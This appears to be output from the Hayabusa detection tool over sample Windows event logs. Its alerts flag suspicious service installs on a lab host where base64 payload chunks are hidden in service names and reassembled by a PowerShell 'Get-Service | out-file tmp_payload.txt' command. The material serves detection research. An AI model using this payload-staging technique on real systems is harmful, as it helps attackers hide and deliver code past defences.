+2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
